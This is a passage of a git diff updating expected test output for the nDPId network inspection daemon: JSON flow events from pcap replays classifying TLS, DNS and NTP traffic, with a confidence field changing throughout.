-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077750,"flow_last_seen":1626168077780,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077750,"flow_last_seen":1626168077780,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075993,"flow_last_seen":1626168077017,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 00582{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","packets-captured":315,"packets-processed":315,"total-skipped-flows":0,"total-l4-payload-len":95708,"total-not-detected-flows":1,"total-guessed-flows":1,"total-detected-flows":33,"total-detection-updates":26,"total-updates":0,"current-active-flows":0,"total-active-flows":35,"total-idle-flows":35,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":218,"global_ts_msec":1626168081946} ~~~~~~~~~~~~~~~~~~~~ 
SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 315/315 @@ -224,9 +224,9 @@ ~~ total active/idle flows...: 35/35 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6026655 bytes -~~ total memory freed........: 6026655 bytes -~~ total allocations/frees...: 118687/118687 +~~ total memory allocated....: 6145257 bytes +~~ total memory freed........: 6145257 bytes +~~ total allocations/frees...: 121445/121445 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2445 chars diff --git a/test/results/tls_cipher_lens.pcap.out b/test/results/tls_cipher_lens.pcap.out index 157eae0a0..04020ae4a 100644 --- a/test/results/tls_cipher_lens.pcap.out +++ b/test/results/tls_cipher_lens.pcap.out 
@@ -2,19 +2,19 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1391444859282} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mDAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAASAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} 
-00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mGAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhgD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mFAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhQD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
